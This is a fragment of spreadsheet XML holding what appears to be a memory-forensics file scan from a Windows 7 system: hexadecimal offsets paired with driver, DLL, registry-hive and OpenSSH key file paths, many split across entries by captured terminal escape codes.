    <t>\Windows\System32\DriverStore\FileRepository\mdmbw561.inf_x86_neutral_aa3607cf9d93f8c0\MDMBW56</t>
  </si>
  <si>
    <t>0xde7c52f8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\compositebus.inf_x86_neutral_a53ef080c39c3218\Com</t>
  </si>
  <si>
    <t>positeBus.inf</t>
  </si>
  <si>
    <t>0xde7c5670</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnsa002.inf_x86_neutral_db272f9cd17a383f\prnsa00</t>
  </si>
  <si>
    <t>0xde7c59e8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmaiwa.inf_x86_neutral_c2d261f9c2b8299f\mdmaiwa.</t>
  </si>
  <si>
    <t>0xde7c5c30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hdaudss.inf_x86_neutral_3f3a26225c0b8f9c\hdaudss.</t>
  </si>
  <si>
    <t>0xde7c5f80</t>
  </si>
  <si>
    <t>0xde7c6350</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wsdprint.inf_x86_neutral_05711b33589b27a9\WSDPrin</t>
  </si>
  <si>
    <t>t.Inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7c6598</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ph3xibc6.inf_x86_neutral_2818f7b3b62bdd39\Ph3xIBC</t>
  </si>
  <si>
    <t>0xde7c68e8</t>
  </si>
  <si>
    <t>0xde7c6f18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\msports.inf_x86_neutral_c1a802e06677f73f\msports.</t>
  </si>
  <si>
    <t>0xde7c71a0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdminfot.inf_x86_neutral_1403b0133ea862c7\mdminfo</t>
  </si>
  <si>
    <t>0xde7c7518</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmsii64.inf_x86_neutral_a32e605ab89d62e6\mdmsii6</t>
  </si>
  <si>
    <t>0xde7c7890</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netnvmx.inf_x86_neutral_7af3f06863f3b983\netnvmx.</t>
  </si>
  <si>
    <t>0xde7c7c08</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmagrs.inf_x86_neutral_81c67a5080f3eef2\mdmagrs.</t>
  </si>
  <si>
    <t>0xde7c7f80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hal.inf_x86_neutral_bf3422256b0b201d\hal.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7c8388</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnsv004.inf_x86_neutral_3ee5a15023f3b3ed\prnsv00</t>
  </si>
  <si>
    <t>0xde7c8700</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnky005.inf_x86_neutral_8a163d363abb7d5a\prnky00</t>
  </si>
  <si>
    <t>0xde7c8a78</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\scsidev.inf_x86_neutral_174cd8d27b46ca16\scsidev.</t>
  </si>
  <si>
    <t>0xde7c8df0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmntt1.inf_x86_neutral_187b4c208d1a7adf\mdmntt1.</t>
  </si>
  <si>
    <t>0xde7c9038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hcw85cir.inf_x86_neutral_e96b5c9f415a42b6\hcw85ci</t>
  </si>
  <si>
    <t>0xde7c9258</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmcxhv3.inf_x86_neutral_15b13e9a734fb085\mdmcxhv</t>
  </si>
  <si>
    <t>0xde7c95d0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnep00f.inf_x86_neutral_07f7a94e565e9af0\prnep00</t>
  </si>
  <si>
    <t>0xde7c9948</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmnttd6.inf_x86_neutral_1a7790e1a07b710e\MDMNTTD</t>
  </si>
  <si>
    <t>0xde7c9cc0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmzyxlg.inf_x86_neutral_380073a54d79b567\mdmzyxl</t>
  </si>
  <si>
    <t>0xde7ca2c0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnca00a.inf_x86_neutral_18bf309f5cc01a3a\prnca00</t>
  </si>
  <si>
    <t>0xde7ca638</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnrc00a.inf_x86_neutral_7818fe41c7df6d84\prnrc00</t>
  </si>
  <si>
    <t>0xde7ca880</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmlucnt.inf_x86_neutral_100c174a78c3e432\mdmlucn</t>
  </si>
  <si>
    <t>0xde7cabd0</t>
  </si>
  <si>
    <t>0xde7cb138</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx00a.inf_x86_neutral_0a6bc7f26d808a89\prnlx00</t>
  </si>
  <si>
    <t>0xde7cb4b0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmminij.inf_x86_neutral_c8028d505d722f96\mdmmini</t>
  </si>
  <si>
    <t>j.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7cb828</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmsun2.inf_x86_neutral_50c7c2b8719aaff8\mdmsun2.</t>
  </si>
  <si>
    <t>0xde7cbba0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnky009.inf_x86_neutral_f01eb3bc43e6f348\prnky00</t>
  </si>
  <si>
    <t>0xde7cbf18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnbr008.inf_x86_neutral_87aae9d395393afd\prnbr00</t>
  </si>
  <si>
    <t>0xde7cc388</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnca003.inf_x86_neutral_f0a023edfd5cd833\prnca00</t>
  </si>
  <si>
    <t>0xde7cc700</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\nete1g32.inf_x86_neutral_ce57dbaa251ea290\nete1g3</t>
  </si>
  <si>
    <t>0xde7cca78</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netl160x.inf_x86_neutral_cef6a4c5e38079d6\netl160</t>
  </si>
  <si>
    <t>0xde7ccdf0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wdma_usb.inf_x86_neutral_8583111d879ac65d\wdma_us</t>
  </si>
  <si>
    <t>0xde7cd260</t>
  </si>
  <si>
    <t>0xde7cd890</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\1394.inf_x86_neutral_832ec31f25d91fee\1394.inf_x001B_[0</t>
  </si>
  <si>
    <t>0xde7cdc08</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnsv002.inf_x86_neutral_ee0379dbd4a7194e\prnsv00</t>
  </si>
  <si>
    <t>0xde7cdf80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netw5v32.inf_x86_neutral_a8056bed0ad979c3\netw5v3</t>
  </si>
  <si>
    <t>0xde7ce268</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx00v.inf_x86_neutral_52b9cad0a55731b7\prnlx00</t>
  </si>
  <si>
    <t>0xde7ce5e0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx009.inf_x86_neutral_b6bfd02f6a69918b\prnlx00</t>
  </si>
  <si>
    <t>0xde7ce958</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\nete1e32.inf_x86_neutral_4bf5bdee9123a61d\nete1e3</t>
  </si>
  <si>
    <t>0xde7cecd0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmnis3t.inf_x86_neutral_7113f2971c91fbb8\mdmnis3</t>
  </si>
  <si>
    <t>0xde7cef18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx004.inf_x86_neutral_ce7ad6f91a9470d7\prnlx00</t>
  </si>
  <si>
    <t>0xde7cf2c0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\smartcrd.inf_x86_neutral_63e72c669d043f14\smartcr</t>
  </si>
  <si>
    <t>0xde7cf508</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\usbvideo.inf_x86_neutral_b63436395ec126b7\usbvide</t>
  </si>
  <si>
    <t>0xde7cf858</t>
  </si>
  <si>
    <t>0xde7cfe88</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\machine.inf_x86_neutral_a97a2a0d0fbc6696\machine.</t>
  </si>
  <si>
    <t>0xde7d0350</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mf.inf_x86_neutral_feb8c30ef59487a2\mf.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7d06c8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmnis2u.inf_x86_neutral_b8089d419b9515bd\mdmnis2</t>
  </si>
  <si>
    <t>0xde7d0910</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmbr006.inf_x86_neutral_ccf3e0108e39bf8b\mdmbr00</t>
  </si>
  <si>
    <t>0xde7d0c60</t>
  </si>
  <si>
    <t>0xde7d1108</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmdgitn.inf_x86_neutral_f557769cb87d8731\mdmdgit</t>
  </si>
  <si>
    <t>0xde7d1480</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wpdfs.inf_x86_neutral_fc4ebadff3a40ae4\WpdFs.inf_x001B_</t>
  </si>
  <si>
    <t>0xde7d17f8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx00y.inf_x86_neutral_a307e415ad8916dc\prnlx00</t>
  </si>
  <si>
    <t>y.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7d1c70</t>
  </si>
  <si>
    <t>0xde7d1f80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\termmou.inf_x86_neutral_0e28c761f9ae155a\termmou.</t>
  </si>
  <si>
    <t>0xde7d2388</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ph3xibc11.inf_x86_neutral_bb18e5f134c40c68\Ph3xIB</t>
  </si>
  <si>
    <t>C11.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7d2700</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\adpahci.inf_x86_neutral_b082e95ec9f8c3f9\adpahci.</t>
  </si>
  <si>
    <t>0xde7d2a78</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnhp002.inf_x86_neutral_e6daa9c39ac001a3\prnhp00</t>
  </si>
  <si>
    <t>0xde7d2df0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmnttd2.inf_x86_neutral_697347a56d862efc\MDMNTTD</t>
  </si>
  <si>
    <t>0xde7d33b8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmboca.inf_x86_neutral_d8d32cd62c998da9\mdmboca.</t>
  </si>
  <si>
    <t>0xde7d3730</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\avc.inf_x86_neutral_6ae951c52c898d14\avc.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7d3978</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnep00e.inf_x86_neutral_2fbbb3b50e96331c\prnep00</t>
  </si>
  <si>
    <t>0xde7d3cc8</t>
  </si>
  <si>
    <t>0xde7d4038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmmotou.inf_x86_neutral_77763577a40a11dc\mdmmoto</t>
  </si>
  <si>
    <t>0xde7d40f8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmrock.inf_x86_neutral_60e0e01cc11eeb89\mdmrock.</t>
  </si>
  <si>
    <t>0xde7d4340</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmneuhs.inf_x86_neutral_693dc92cc3806779\mdmneuh</t>
  </si>
  <si>
    <t>0xde7d4690</t>
  </si>
  <si>
    <t>0xde7d4828</t>
  </si>
  <si>
    <t>\Windows\System32\cryptsp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7d4cc0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\sensorsalsdriver.inf_x86_neutral_e8b9902de1fb346a</t>
  </si>
  <si>
    <t>\sensorsalsdr</t>
  </si>
  <si>
    <t>iver.inf_x001B_[0</t>
  </si>
  <si>
    <t>0xde7d5320</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnkm002.inf_x86_neutral_ded1a36701bddc86\prnkm00</t>
  </si>
  <si>
    <t>0xde7d5698</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmrock4.inf_x86_neutral_3428cf61c6a0bb23\mdmrock</t>
  </si>
  <si>
    <t>0xde7d5a10</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiabr004.inf_x86_neutral_7d1d9b8c3c8f2a9e\wiabr00</t>
  </si>
  <si>
    <t>0xde7d5d88</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ws3cap.inf_x86_neutral_dac7c9faa4fc2a78\ws3cap.in</t>
  </si>
  <si>
    <t>0xde7d6220</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\modemcsa.inf_x86_neutral_0243209867cd0efc\modemcs</t>
  </si>
  <si>
    <t>0xde7d6570</t>
  </si>
  <si>
    <t>0xde7d6770</t>
  </si>
  <si>
    <t>0xde7d6ba0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\averhbh826_noaverir.inf_x86_neutral_620e8a01977ec</t>
  </si>
  <si>
    <t>b40\averhbh82</t>
  </si>
  <si>
    <t>6_noaverir.</t>
  </si>
  <si>
    <t>inf_x001B_[0</t>
  </si>
  <si>
    <t>0xde7d6f18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmmcom.inf_x86_neutral_e973b9a1b51c2b2f\mdmmcom.</t>
  </si>
  <si>
    <t>0xde7d7518</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiabr00a.inf_x86_neutral_ac88c3f9903ef7c8\wiabr00</t>
  </si>
  <si>
    <t>0xde7d7890</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\transfercable.inf_x86_neutral_82f4c743c8996d67\Tr</t>
  </si>
  <si>
    <t>ansferCable.i</t>
  </si>
  <si>
    <t>0xde7d7c08</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmrock5.inf_x86_neutral_e6f3135f34c11cb2\mdmrock</t>
  </si>
  <si>
    <t>0xde7d7f80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ph3xibc9.inf_x86_neutral_ff3a566e4b6ba035\Ph3xIBC</t>
  </si>
  <si>
    <t>0xde7d8038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_166_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7d8360</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\cxraptor_fm1236mk5_ibv32.inf_x86_neutral_beee91cc</t>
  </si>
  <si>
    <t>d1e8c623\cxra</t>
  </si>
  <si>
    <t>ptor_FM1236</t>
  </si>
  <si>
    <t>0xde7d86d8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmbtmdm.inf_x86_neutral_321fa2ecf7803227\mdmbtmd</t>
  </si>
  <si>
    <t>0xde7d8a50</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ph3xibc3.inf_x86_neutral_1da6abc36a79974f\Ph3xIBC</t>
  </si>
  <si>
    <t>0xde7d8c98</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wialx005.inf_x86_neutral_dfd299ed243bbc21\wialx00</t>
  </si>
  <si>
    <t>0xde7d8f80</t>
  </si>
  <si>
    <t>0xde7d9350</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\sti.inf_x86_neutral_24eb5587941b03fb\sti.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7d96c8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hdaudio.inf_x86_neutral_5a5e688ecb9e273f\hdaudio.</t>
  </si>
  <si>
    <t>0xde7d9910</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnca00y.inf_x86_neutral_a6e2b48d7bbe4516\prnca00</t>
  </si>
  <si>
    <t>0xde7d9c60</t>
  </si>
  <si>
    <t>0xde7da3b8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmmotsm.inf_x86_neutral_c1415d9789c54b89\mdmmots</t>
  </si>
  <si>
    <t>0xde7da730</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmatm2k.inf_x86_neutral_50b7155b64dfef63\mdmatm2</t>
  </si>
  <si>
    <t>0xde7da978</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\lsi_sas.inf_x86_neutral_a4d6780f72cbd5b4\lsi_sas.</t>
  </si>
  <si>
    <t>0xde7dacc8</t>
  </si>
  <si>
    <t>0xde7db038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmcxav3.inf_x86_neutral_3c9275be906b01dd\mdmcxav</t>
  </si>
  <si>
    <t>0xde7db4c0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Protect\CREDHIST_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7db818</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB2719857~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7db9a0</t>
  </si>
  <si>
    <t>\Windows\System32\atl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7dbb68</t>
  </si>
  <si>
    <t>\Windows\System32\wer.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7dc6e8</t>
  </si>
  <si>
    <t>0xde7dc810</t>
  </si>
  <si>
    <t>\Windows\System32\api-ms-win-core-timezone-l1-1-0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7dc8c8</t>
  </si>
  <si>
    <t>0xde7dc990</t>
  </si>
  <si>
    <t>\Windows\System32\wcnwiz.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7dce20</t>
  </si>
  <si>
    <t>\Windows\System32\msctf.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7dd908</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7ddcd8</t>
  </si>
  <si>
    <t>\Windows\System32\vss_ps.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7ddf80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7de248</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\ProfUIS293ad32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7df130</t>
  </si>
  <si>
    <t>\Windows\System32\upnp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7e0038</t>
  </si>
  <si>
    <t>\Windows\System32\config\SAM_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7e23a0</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\mfc100u.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7e2c20</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7e2e50</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Backup and Restore Center.lnk_x001B_[</t>
  </si>
  <si>
    <t>0xde7e3188</t>
  </si>
  <si>
    <t>\Windows\System32\unregmp2.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7e3800</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ac</t>
  </si>
  <si>
    <t>cessories\Des</t>
  </si>
  <si>
    <t>ktop.ini_x001B_[0</t>
  </si>
  <si>
    <t>0xde7e3ac0</t>
  </si>
  <si>
    <t>\Windows\explorer.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7e47d8</t>
  </si>
  <si>
    <t>\BGinfo\BGINFO.EXE_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7e4c08</t>
  </si>
  <si>
    <t>0xde7e6320</t>
  </si>
  <si>
    <t>0xde7e64e0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7e8320</t>
  </si>
  <si>
    <t>0xde7e8958</t>
  </si>
  <si>
    <t>\Windows\System32\PlaySndSrv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7e95f8</t>
  </si>
  <si>
    <t>\Windows\System32\SensApi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7ea438</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7eaeb8</t>
  </si>
  <si>
    <t>\Windows\System32\usp10.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7eb5b8</t>
  </si>
  <si>
    <t>0xde7ec038</t>
  </si>
  <si>
    <t>\Windows\Media\Windows Navigation Start.wav_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7ec118</t>
  </si>
  <si>
    <t>\Windows\System32\config\SECURITY_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7ec468</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wship6.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7ecac8</t>
  </si>
  <si>
    <t>\Windows\System32\SMI\Store\Machine\SCHEMA.DAT_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7ee4b0</t>
  </si>
  <si>
    <t>0xde7ee970</t>
  </si>
  <si>
    <t>\Windows\System32\xpsrchvw.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7eea28</t>
  </si>
  <si>
    <t>\Windows\System32\FXSRESM.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7ef038</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\da7zip.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7efe50</t>
  </si>
  <si>
    <t>\Windows\System32\user32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7f00e8</t>
  </si>
  <si>
    <t>\Windows\System32\werconcpl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7f03c0</t>
  </si>
  <si>
    <t>0xde7f07e0</t>
  </si>
  <si>
    <t>0xde7f2348</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\adshattrdefs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7f33b8</t>
  </si>
  <si>
    <t>\Windows\System32\config\SOFTWARE_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7f3760</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7f4d58</t>
  </si>
  <si>
    <t>\Windows\System32\sechost.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7f5038</t>
  </si>
  <si>
    <t>0xde7f52e0</t>
  </si>
  <si>
    <t>\Windows\System32\d3d10_1.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7f5c18</t>
  </si>
  <si>
    <t>\Windows\System32\config\COMPONENTS_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7f6618</t>
  </si>
  <si>
    <t>0xde7f66d0</t>
  </si>
  <si>
    <t>\System Volume Information\SPP\SppGroupCache\{CA2E7444-A1A5-459C-A931-762CCA21980F}_WindowsUpd</t>
  </si>
  <si>
    <t>ateInfoeInfo_x001B_</t>
  </si>
  <si>
    <t>0xde7f8518</t>
  </si>
  <si>
    <t>0xde7f8bb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_RollupFix~31bf3856ad364e35~x86~~7601.23964.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7f8d20</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2579686~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7fa038</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Remote Assistance.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7fcf80</t>
  </si>
  <si>
    <t>\Windows\System32\clbcatq.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7fd160</t>
  </si>
  <si>
    <t>0xde7fdec8</t>
  </si>
  <si>
    <t>\Windows\System32\MsCtfMonitor.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7fdf80</t>
  </si>
  <si>
    <t>\Windows\System32\timedate.cpl_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7fe8a0</t>
  </si>
  <si>
    <t>0xde7fec10</t>
  </si>
  <si>
    <t>\Windows\System32\dtsh.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7ffcb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_40_for_KB3068708~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde800b80</t>
  </si>
  <si>
    <t>0xde8012b0</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\esscli.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8013a0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\pci.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8015a0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wdc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde803038</t>
  </si>
  <si>
    <t>\Windows\System32\hnetcfg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8047c8</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8049b0</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\etc\ssh_host_rsa_key.pub_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8091b8</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\etc\ssh_host_rsa_key_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8094a0</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\etc\ssh_host_dsa_key_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80a038</t>
  </si>
  <si>
    <t>0xde80a738</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\wbemsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80a7f0</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\etc\ssh_host_ecdsa_key_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80aec8</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B8C</t>
  </si>
  <si>
    <t>C409ACDBF2A2F</t>
  </si>
  <si>
    <t>E04C56F2875</t>
  </si>
  <si>
    <t>B1FD6_x001B_</t>
  </si>
  <si>
    <t>0xde80af80</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B8</t>
  </si>
  <si>
    <t>CC409ACDBF2A2</t>
  </si>
  <si>
    <t>FE04C56F287</t>
  </si>
  <si>
    <t>5B1FD6</t>
  </si>
  <si>
    <t>0xde80b038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2857650~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80b200</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB976422_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80b5e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB976422~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80b918</t>
  </si>
  <si>
    <t>0xde80b9d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~x86~en-U</t>
